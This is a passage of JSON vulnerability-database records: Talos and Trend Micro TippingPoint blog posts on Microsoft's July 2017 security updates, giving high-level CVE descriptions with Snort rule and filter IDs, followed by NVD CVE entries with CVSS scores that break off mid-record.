<br /><br /><h4>CVE-2017-8467</h4>An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8486</h4>This is an information disclosure vulnerability in Microsoft Windows when Win32k fails to properly handle objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application. <br /><br /><h4>CVE-2017-8495</h4>A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. Successful exploitation of this vulnerability could be used to bypass Extended Protection for Authentication. <br /><br /><h4>CVE-2017-8501 / CVE-2017-8502</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website. <br /><br /><h4>CVE-2017-8556</h4>An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8557</h4>An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity (XXE). To exploit the vulnerability, an attacker could create specially crafted XML data. <br /><br /><h4>CVE-2017-8559 / CVE-2017-8560</h4>An elevation of privilege vulnerability exists when Microsoft Exchange Outlook Web Access (OWA) fails to properly handle web requests. 
Exploitation requires an authenticated attacker to send a specially crafted request. <br /><br /><h4>CVE-2017-8561</h4>This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8562</h4>There is a privilege escalation vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call (ALPC). This is exploitable by a local attacker executing a specially crafted application to elevate privilege.<br /><br /><h4>CVE-2017-8563</h4>An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol. This is exploitable by a local attacker executing a specially crafted application to send malicious traffic to a domain controller. <br /><br /><h4>CVE-2017-8564</h4>This is an information disclosure vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by a local attacker executing a crafted application, allowing the attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. <br /><br /><h4>CVE-2017-8565</h4>This is a remote code execution vulnerability within PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system. <br /><br /><h4>CVE-2017-8566</h4>This is an elevation of privilege vulnerability in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled, so an attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. 
This is exploitable by a local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8569</h4>An elevation of privilege vulnerability exists in Microsoft SharePoint Server when it does not properly sanitize a specially crafted web request. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. If successful, the attacker could then perform cross-site scripting attacks on affected systems and run scripts with the privileges of the current user. This can allow the attacker to read content they are not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user.<br /><br /><h4>CVE-2017-8570</h4>A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file.<br /><br /><h4>CVE-2017-8573 / CVE-2017-8574 / CVE-2017-8577 / CVE-2017-8578 / CVE-2017-8580</h4>An elevation of privilege vulnerability exists in Microsoft Graphics Component. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.<br /><br /><h4>CVE-2017-8581</h4>An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An authenticated attacker who successfully exploited this vulnerability could run processes in an elevated context.<br /><br /><h4>CVE-2017-8582</h4>An Information Disclosure vulnerability exists when the HTTP.sys server application component improperly handles objects in memory. 
A remote unauthenticated attacker could exploit this vulnerability by issuing a request to the server application.<br /><br /><h4>CVE-2017-8585</h4>A denial of service vulnerability exists when the Microsoft Common Object Runtime Library improperly handles web requests. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET application. This attack could cause a denial of service on the target system, requiring a reboot to resolve. <br /><br /><h4>CVE-2017-8587</h4>A Denial Of Service vulnerability exists when Windows Explorer attempts to open a non-existent file. An attacker could exploit this vulnerability by hosting a specially crafted web site and convincing a user to browse to a page containing a reference to the non-existent file, causing the victim's system to stop responding.<br /><br /><h4>CVE-2017-8588</h4>A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files. Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. An attacker could exploit the vulnerability by sending a specially crafted file to the user via email.<br /><br /><h4>CVE-2017-8590</h4>An elevation of privilege vulnerability exists in Windows Common Log File System (CLFS). A locally authenticated attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.<br /><br /><h4>CVE-2017-8592</h4>A security feature bypass vulnerability exists when Microsoft Browsers improperly handle redirect requests. This vulnerability allows Microsoft Browsers to bypass CORS redirect restrictions and follow redirect requests that should otherwise be ignored. 
An attacker who successfully exploited this vulnerability could force the browser to send data that would otherwise be restricted to a destination web site of their choice.<br /><br /><h4>CVE-2017-8599</h4>A security feature bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. This can be exploited by a user visiting a specially crafted webpage. <br /><br /><h4>CVE-2017-8602</h4>This is a spoofing vulnerability in Microsoft Browser when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities. <br /><br /><h3>Coverage</h3><div><br /></div>In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your Management Center or Snort.org.<br /><br />Snort Rules:<br />42753<br />42755-42756<br />43460-43463<br />43465-43466<br />43469-43474<br />43490-43493<br />43521-43522<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=21ZcWIIsN98:w-MkB9T8JeY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/21ZcWIIsN98\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-07-11T19:59:29", "published": "2017-07-11T12:59:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/21ZcWIIsN98/ms-tuesday.html", "id": "TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "title": "Microsoft Patch Tuesday - July 2017", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-07-15T11:18:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8501", "CVE-2017-8502", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8570", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8594", "CVE-2017-8560", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8559", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-0243", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8569", "CVE-2017-8463", "CVE-2017-8590"], "description": "\n\nBefore the world of 
laptops, tablets and smart phones, some of us had to use paper-based solutions to keep track of our calendars and to-do lists. I used a Franklin Planner, where I kept track of my calendar as well as my never-ending to-do list. The Franklin Planner used the \u201cABC\u201d system to help you prioritize your tasks. If you use Microsoft Outlook, you can see this same approach in the Tasks section where you can assign your items with a high, normal, or low priority.\n\nIf you have a large number of tasks on your plate, it\u2019s a nice and easy way to prioritize what you need to work on first.\n\nNow imagine using a Franklin planner to prioritize thousands of security events in your network every 30 seconds? It\u2019s inconceivable! Even if you have an arsenal of security tools at your disposal, how do you determine what to focus on first? To help our customers make sense of what\u2019s going on in their network, we recently announced [SMS Threat Insights](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/integrated-atp/security-management-system/SB01_Threat_Insights_2017.pdf>), a new feature in our TippingPoint Security Management System (SMS). SMS Threat Insights aggregates threat data from multiple sources and compiles it to help you prioritize security response measures, increase visibility into current and potential threats impacting your network, and provide insight into preemptive protection actions that may have already been taken. You can learn more about SMS Threat Insights from my blog: [Not All Threats Are Created Equal](<http://blog.trendmicro.com/not-threats-created-equal/>). If you want to see SMS Threat Insights in action, get a quick demo [here](<https://www.youtube.com/watch?v=gc4K2JFS86E&t=12s>).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before July 11, 2017. 
Microsoft released patches for Windows, Internet Explorer, Edge, Office, SharePoint, .NET Framework, Exchange, and HoloLens. A total of 19 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [July 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/7/11/the-july-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0170 | | No Vendor Intelligence Provided \nCVE-2017-0243 | 29051 | \nCVE-2017-8463 | | No Vendor Intelligence Provided \nCVE-2017-8467 | | No Vendor Intelligence Provided \nCVE-2017-8486 | | No Vendor Intelligence Provided \nCVE-2017-8495 | | No Vendor Intelligence Provided \nCVE-2017-8501 | | No Vendor Intelligence Provided \nCVE-2017-8502 | | No Vendor Intelligence Provided \nCVE-2017-8556 | | No Vendor Intelligence Provided \nCVE-2017-8557 | | No Vendor Intelligence Provided \nCVE-2017-8559 | | No Vendor Intelligence Provided \nCVE-2017-8560 | | No Vendor Intelligence Provided \nCVE-2017-8561 | | No Vendor Intelligence Provided \nCVE-2017-8562 | | No Vendor Intelligence Provided \nCVE-2017-8563 | | No Vendor Intelligence Provided \nCVE-2017-8564 | | No Vendor Intelligence Provided \nCVE-2017-8565 | | No Vendor Intelligence Provided \nCVE-2017-8566 | | No Vendor Intelligence Provided \nCVE-2017-8569 | | No Vendor Intelligence Provided \nCVE-2017-8570 | | No Vendor Intelligence Provided \nCVE-2017-8573 | | No Vendor Intelligence Provided \nCVE-2017-8574 | | No Vendor Intelligence Provided \nCVE-2017-8577 | 29054 | \nCVE-2017-8578 | 29055 | \nCVE-2017-8580 | | Insufficient Vendor Information \nCVE-2017-8581 | | No Vendor Intelligence Provided \nCVE-2017-8582 | | No Vendor Intelligence Provided \nCVE-2017-8584 | | No Vendor Intelligence Provided \nCVE-2017-8585 | | No Vendor Intelligence 
Provided \nCVE-2017-8587 | | No Vendor Intelligence Provided \nCVE-2017-8588 | | No Vendor Intelligence Provided \nCVE-2017-8589 | | No Vendor Intelligence Provided \nCVE-2017-8590 | | No Vendor Intelligence Provided \nCVE-2017-8592 | 29048 | \nCVE-2017-8594 | 29046 | \nCVE-2017-8595 | | No Vendor Intelligence Provided \nCVE-2017-8596 | | No Vendor Intelligence Provided \nCVE-2017-8598 | 29050 | \nCVE-2017-8599 | | No Vendor Intelligence Provided \nCVE-2017-8601 | 29047 | \nCVE-2017-8602 | | No Vendor Intelligence Provided \nCVE-2017-8603 | | No Vendor Intelligence Provided \nCVE-2017-8604 | | No Vendor Intelligence Provided \nCVE-2017-8605 | 29049 | \nCVE-2017-8606 | | No Vendor Intelligence Provided \nCVE-2017-8607 | | No Vendor Intelligence Provided \nCVE-2017-8608 | | No Vendor Intelligence Provided \nCVE-2017-8609 | | No Vendor Intelligence Provided \nCVE-2017-8610 | | No Vendor Intelligence Provided \nCVE-2017-8611 | | No Vendor Intelligence Provided \nCVE-2017-8617 | 29056 | \nCVE-2017-8618 | 29045 | \nCVE-2017-8619 | 29057 | \n \n \n\n**End of Sale/End of Life Announcement for TippingPoint N-Series (S660N and S1400N)**\n\nLast week, we announced the end-of-sale (EOS) and end-of-life (EOL) dates for the TippingPoint N-Series solutions (S660N and S1400N). The last day to order the affected products is September 30, 2017 while quantities last. Customers with active maintenance contracts will continue to receive support from TippingPoint\u2019s Technical Assistance Center (TAC) for five years after the end-of-sale date. Maintenance contracts can continue to be purchased to cover the five years of support following the end-of-sale date, however, they must be purchased during the first two years following the end-of-sale date as described in the table below. 
Maintenance contracts cannot be extended beyond the end-of-support date.\n\n**_Impacted Product SKUs and Descriptions_**\n\n**Part Number (HP/Trend Micro)** | **Device Description** | **End of Sale Date** \n---|---|--- \nJC019A/TPNN0020 | TippingPoint S660N Intrusion Prevention System | September 30, 2017 \nJC020A/TPNN0023 | TippingPoint S1400N Intrusion Prevention System | September 30, 2017 \n \n \n\n**_Product End of Life Dates_**\n\n**Milestone** | **Definition** | **End of Sale Date** \n---|---|--- \nEnd of Sale Announcement | The date on which Trend Micro announces the upcoming end of sale and end of support of a product. | July 7, 2017 \nEnd of Sale (Appliance) | The last date to order a product through Trend Micro point of sale. The product is removed from the price list after this date. | September 30, 2017 \nEnd of Sale (Maintenance Renewals) | The last date to order maintenance renewals. | September 30, 2019 \nEnd of Support | The last date that support calls will be accepted for the affected product. RMA\u2019s will cease after this date. Digital Vaccine and ThreatDV updates will cease for the affected products after this date. | September 30, 2022 \n \n \n\nWe recommend that customers upgrade to the most current TippingPoint security platforms. At the time of this bulletin, the Threat Protection System (TPS) models 440T, 2200T and vTPS are the most comparable models to the 660N and 1400N. 
Contact your sales representative for more information:\n\n| \n\n * TippingPoint 440T Threat Protection System (TPNN0002)\n * TippingPoint 2200T Threat Protection System (TPNN0005)\n * TippingPoint 2600NX Intrusion Prevention System (TPNN0048)\n * Virtual Threat Protection System (TPTN0060) \n---|--- \n| \n \nCustomers with concerns or questions regarding this issue can contact the Trend Micro TippingPoint Technical Assistance Center (TAC).\n\n**Zero-Day Filters**\n\nThere is one new zero-day filter covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Linksys (1)_**\n\n| \n\n * 29060: ZDI-CAN-4892: Zero Day Initiative Vulnerability (Linksys WVBR0)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/>).", "modified": "2017-07-14T12:00:02", "published": "2017-07-14T12:00:02", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-10-2017/", "id": "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 10, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Edge in Microsoft Windows 10 1511, 1607, and 1703, and Windows Server 2016 allow an attacker 
to execute arbitrary code in the context of the current user when the JavaScript engine fails to render when handling objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8596, CVE-2017-8610, CVE-2017-8598, CVE-2017-8618, CVE-2017-8619, CVE-2017-8595, CVE-2017-8601, CVE-2017-8604, CVE-2017-8605, CVE-2017-8606, CVE-2017-8607, CVE-2017-8608, and CVE-2017-8609.", "edition": 3, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8603", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8603"], "modified": "2017-07-13T19:30:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-8603", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8603", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 allow an attacker to send specially crafted requests to a .NET web application, resulting in 
denial of service, aka .NET Denial of Service Vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8585", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8585"], "modified": "2017-12-02T02:29:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:4.7", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.6"], "id": "CVE-2017-8585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8585", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Windows Shell in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows a remote code execution 
vulnerability due to the way it improperly handles executable files and shares during rename operations, aka \"Windows Explorer Remote Code Execution Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8463", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8463"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8463", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Graphics in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when it fails to properly handle objects in memory, aka \"Microsoft Graphics Component Elevation of Privilege Vulnerability\". 
This CVE ID is unique from CVE-2017-8573 and CVE-2017-8574.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8556", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8556"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8556", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8556", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an information disclosure due to the way it handles objects in memory, aka \"Win32k Information Disclosure Vulnerability\".", "edition": 3, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8486", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8486"], "modified": "2017-07-17T13:19:00", "cpe": 
